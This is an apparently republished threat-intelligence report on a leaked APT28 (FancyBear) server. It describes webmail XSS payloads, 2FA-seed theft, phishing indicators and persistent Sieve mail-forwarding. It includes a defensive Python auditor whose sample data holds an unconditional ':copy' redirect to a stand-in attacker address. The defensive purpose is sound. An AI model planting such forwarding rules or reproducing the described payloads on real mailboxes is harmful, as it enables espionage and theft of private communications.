Greece’s National Defence General Staff, Romanian Air Force and Government of Serbia: FancyBear Server Leak Exposes Stolen Credentials, 2FA Secrets, NATO Targets

FancyBear’s OPSEC Blunder Exposes Russian Espionage Operations Targeting NATO-Aligned Governments

A critical operational security (OPSEC) failure by the Russian state-backed threat group APT28 (FancyBear) has exposed a live command-and-control (C2) server containing stolen credentials, two-factor authentication (2FA) secrets, and detailed logs of ongoing cyberespionage campaigns. The breach, analyzed by researchers from Ctrl-Alt-Intel and Hunt.io, provides unprecedented visibility into the group’s tactics, infrastructure, and high-value targets across Europe.

The Exposure: A Goldmine of Stolen Data

The compromised server, hosted on Namecheap infrastructure at 203.161.50[.]145, contained an open directory with:

  • 2,800+ exfiltrated emails
  • 240+ credential sets, including TOTP 2FA secrets
  • 140+ persistent email forwarding rules
  • 11,500+ harvested contact addresses
  • C2 source code, payloads, and operator logs

Victims included government and military entities in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia, many of which are NATO members or closely aligned with the alliance. Targets ranged from regional Ukrainian prosecutors to the Romanian Air Force and Greece’s National Defence General Staff, aligning with Russia’s strategic focus on Ukraine-related military logistics and support.

How the Attack Unfolded

FancyBear’s campaign leveraged Roundcube and SquirrelMail webmail vulnerabilities, exploiting cross-site scripting (XSS) flaws to deploy malicious JavaScript payloads. Key components included:

  • "worker.js" family payloads: Silently stole credentials, exfiltrated entire inboxes, and harvested address books.
  • keyTwoAuth.js: Targeted the twofactor_gauthenticator plugin, extracting TOTP seeds and recovery codes in base64, enabling long-term 2FA bypass.
  • addRedirectMailBox.js: Abused Roundcube’s ManageSieve to create persistent email forwarding rules, ensuring continued access even if the initial XSS vector was closed.

Phishing emails directed victims to a fake Google Docs domain (docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com), which used a fake reCAPTCHA (ClickFix) to deliver Metasploit payloads tied to the same C2 server.

A Rare Glimpse into APT28’s Operations

Despite prior exposure by CERT-UA in late 2024 linking the same IP to Roundcube exploitation and ClickFix phishing, FancyBear continued operating from the server for nearly 500 days, into early 2026. The root cause was a basic but critical OPSEC mistake: leaving HTTP open directories exposed while staging payloads and exfiltrated data.

Telemetry from Censys and Hunt.io revealed multiple open directories on port 8889 between January and March 2026, allowing defenders to download the full toolkit, observe campaign evolution, and track operator behavior in near real time.

Geopolitical and Defensive Implications

The victim profile reinforces APT28’s strategic targeting, focusing on nations providing military aid, training, or logistical support to Ukraine. The campaign overlaps with ESET’s "Operation RoundPress" and CERT-UA’s ClickFix advisories, further solidifying attribution to GRU-linked FancyBear.

For defenders, the incident highlights vulnerabilities in webmail platforms (Roundcube, SquirrelMail), the risks of unhardened ManageSieve integrations, and the need to monitor for indicators like 203.161.50[.]145 and zhblz[.]com. Most critically, it demonstrates that even highly resourced state actors can make simple OPSEC errors, creating rare opportunities for disruption.
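The persistence mechanism described above (a Sieve rule created through ManageSieve that forwards mail off-domain) is something a mail administrator can audit for directly. The following script is an added example, not code from the article or from Ctrl-Alt-Intel or Hunt.io. It assumes you can export each mailbox's active Sieve script from the server's Sieve storage; the sample scripts, the organisation domain gov.example and the attacker-style addresses are constructed placeholders. It flags every `redirect` action pointing outside the organisation, and ranks a top-level `:copy` redirect highest, because that combination forwards every message while leaving the victim's inbox looking untouched.

```python
import re
from dataclasses import dataclass

# Constructed sample Sieve scripts keyed by mailbox owner (not material from the
# leaked server). "bob" carries the kind of rule the article describes: an
# unconditional :copy redirect that silently forwards every message off-domain.
SAMPLE_SCRIPTS = {
    "alice": (
        'require ["fileinto"];\n'
        'if header :contains "subject" "newsletter" {\n'
        '  fileinto "Lists";\n'
        '}\n'
    ),
    "bob": (
        'require ["copy"];\n'
        '# constructed placeholder for an attacker-controlled address\n'
        'redirect :copy "collector@attacker-placeholder.example";\n'
    ),
    "carol": 'redirect "carol.backup@gov.example";\n',  # internal target, not suspicious
    "dave": (
        'if address :is "from" "boss@gov.example" {\n'
        '  redirect "dave@personal-placeholder.example";\n'
        '}\n'
    ),
}

# Domains considered internal to the organisation (assumption for this example).
ORG_DOMAINS = {"gov.example"}

# Matches `redirect [:tag ...] "address";`, the Sieve action used for forwarding.
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"\s*;', re.IGNORECASE)
# Sieve supports `# ...` line comments and `/* ... */` block comments.
COMMENT_RE = re.compile(r'#[^\n]*|/\*.*?\*/', re.DOTALL)


@dataclass
class Finding:
    user: str
    address: str
    copy: bool           # :copy keeps the original, so the victim sees nothing unusual
    unconditional: bool  # a top-level redirect applies to every incoming message


def is_external(address, org_domains):
    """True when the address's domain is neither an org domain nor a subdomain of one."""
    domain = address.rsplit("@", 1)[-1].lower()
    return not (domain in org_domains or any(domain.endswith("." + d) for d in org_domains))


def audit_sieve(user, script, org_domains):
    """Return a Finding for every redirect in `script` whose target is off-domain."""
    body = COMMENT_RE.sub("", script)
    findings = []
    for m in REDIRECT_RE.finditer(body):
        tags, address = m.group(1).lower(), m.group(2)
        if not is_external(address, org_domains):
            continue
        # Brace depth at the match position tells us whether the action sits
        # inside an `if` block (conditional) or at top level (unconditional).
        prefix = body[:m.start()]
        depth = prefix.count("{") - prefix.count("}")
        findings.append(Finding(user, address, ":copy" in tags, depth == 0))
    return findings


def audit_all(scripts, org_domains):
    """Audit a {user: sieve_script} mapping and collect all off-domain redirects."""
    findings = []
    for user, script in scripts.items():
        findings.extend(audit_sieve(user, script, org_domains))
    return findings


if __name__ == "__main__":
    for f in audit_all(SAMPLE_SCRIPTS, ORG_DOMAINS):
        severity = "HIGH" if f.copy and f.unconditional else "MEDIUM"
        print(f"[{severity}] {f.user}: redirect to {f.address} "
              f"(copy={f.copy}, unconditional={f.unconditional})")
```

Run this against a periodic export of every user's active script and alert on any new off-domain redirect; the brace counting is deliberately simple and will miscount only if a quoted string in the script itself contains braces, which is rare in practice.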

Source: https://gbhackers.com/fancybear-server-leak/

Ministry of National Defence - Romania cybersecurity rating report: https://www.rankiteo.com/company/ministry-of-national-defence-romania

Hellenic Army cybersecurity rating report: https://www.rankiteo.com/company/hellenic-army-es

Greenbrier Government Solutions cybersecurity rating report: https://www.rankiteo.com/company/greenbrier-government-solutions

"id": "MINHELGRE1773843944",
"linkid": "ministry-of-national-defence-romania, hellenic-army-es, greenbrier-government-solutions",
"type": "Cyber Attack",
"date": "3/2026",
"severity": "100",
"impact": "8",
"explanation": "Attack that could bring to a war"
{'affected_entities': [{'industry': 'Defense, Military',
                        'location': 'Ukraine',
                        'name': 'Ukrainian government entities',
                        'type': 'Government'},
                       {'industry': 'Defense',
                        'location': 'Romania',
                        'name': 'Romanian Air Force',
                        'type': 'Military'},
                       {'industry': 'Defense',
                        'location': 'Greece',
                        'name': 'Greece’s National Defence General Staff',
                        'type': 'Military'},
                       {'industry': 'Defense, Military',
                        'location': 'Bulgaria',
                        'name': 'Bulgarian government entities',
                        'type': 'Government'},
                       {'industry': 'Defense, Military',
                        'location': 'Serbia',
                        'name': 'Serbian government entities',
                        'type': 'Government'},
                       {'industry': 'Defense, Military',
                        'location': 'North Macedonia',
                        'name': 'North Macedonian government entities',
                        'type': 'Government'}],
 'attack_vector': ['Phishing',
                   'Cross-Site Scripting (XSS)',
                   'Exploitation of Webmail Vulnerabilities'],
 'data_breach': {'data_exfiltration': True,
                 'number_of_records_exposed': '2,800+ emails, 240+ credential '
                                              'sets, 11,500+ contact addresses',
                 'personally_identifiable_information': 'Yes (emails, contact '
                                                        'details, credentials)',
                 'sensitivity_of_data': 'High (military and government '
                                        'communications, TOTP seeds, recovery '
                                        'codes)',
                 'type_of_data_compromised': ['Emails',
                                              'Credentials',
                                              'Two-Factor Authentication (2FA) '
                                              'secrets',
                                              'Contact addresses']},
 'date_detected': '2026-03',
 'description': 'A critical operational security (OPSEC) failure by the '
                'Russian state-backed threat group APT28 (FancyBear) exposed a '
                'live command-and-control (C2) server containing stolen '
                'credentials, two-factor authentication (2FA) secrets, and '
                'detailed logs of ongoing cyberespionage campaigns. The breach '
                'provided unprecedented visibility into the group’s tactics, '
                'infrastructure, and high-value targets across Europe, '
                'including government and military entities in NATO-aligned '
                'nations.',
 'impact': {'data_compromised': '2,800+ exfiltrated emails, 240+ credential '
                                'sets (including TOTP 2FA secrets), 140+ '
                                'persistent email forwarding rules, 11,500+ '
                                'harvested contact addresses',
            'identity_theft_risk': 'High (TOTP seeds and recovery codes '
                                   'exposed)',
            'operational_impact': 'Persistent access to sensitive government '
                                  'and military communications, long-term '
                                  'espionage capabilities',
            'systems_affected': ['Roundcube webmail',
                                 'SquirrelMail webmail',
                                 'Email servers']},
 'initial_access_broker': {'backdoors_established': 'Persistent email '
                                                    'forwarding rules via '
                                                    'ManageSieve',
                           'entry_point': 'Phishing emails with fake Google '
                                          'Docs domains (e.g., '
                                          'docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com)',
                           'high_value_targets': 'Government and military '
                                                 'entities in NATO-aligned '
                                                 'nations'},
 'investigation_status': 'Ongoing (as of early 2026)',
 'lessons_learned': 'Basic OPSEC failures (e.g., exposed HTTP directories) can '
                    'undermine even sophisticated state-sponsored cyber '
                    'operations. Webmail platforms like Roundcube and '
                    'SquirrelMail are high-value targets for espionage. '
                    'ManageSieve integrations must be hardened to prevent '
                    'persistent access via email forwarding rules.',
 'motivation': 'State-sponsored espionage, military intelligence gathering',
 'post_incident_analysis': {'root_causes': 'OPSEC failure (exposed HTTP open '
                                           'directories on port 8889), '
                                           'unpatched webmail vulnerabilities '
                                           '(Roundcube, SquirrelMail), lack of '
                                           'monitoring for ManageSieve abuses'},
 'recommendations': ['Monitor for indicators like 203.161.50[.]145 and '
                     'zhblz[.]com',
                     'Harden webmail platforms (Roundcube, SquirrelMail) '
                     'against XSS and ManageSieve abuses',
                     'Implement enhanced monitoring for unusual email '
                     'forwarding rules',
                     'Educate users on phishing risks, especially fake '
                     'reCAPTCHA and Google Docs lures'],
 'references': [{'source': 'Ctrl-Alt-Intel and Hunt.io'},
                {'source': 'CERT-UA'},
                {'source': 'ESET (Operation RoundPress)'},
                {'source': 'Censys and Hunt.io telemetry'}],
 'response': {'third_party_assistance': 'Ctrl-Alt-Intel, Hunt.io, CERT-UA, '
                                        'ESET'},
 'threat_actor': 'APT28 (FancyBear)',
 'title': 'FancyBear’s OPSEC Blunder Exposes Russian Espionage Operations '
          'Targeting NATO-Aligned Governments',
 'type': 'Cyber Espionage',
 'vulnerability_exploited': ['Roundcube and SquirrelMail webmail '
                             'vulnerabilities',
                             'Cross-Site Scripting (XSS) flaws',
                             'ManageSieve misconfigurations']}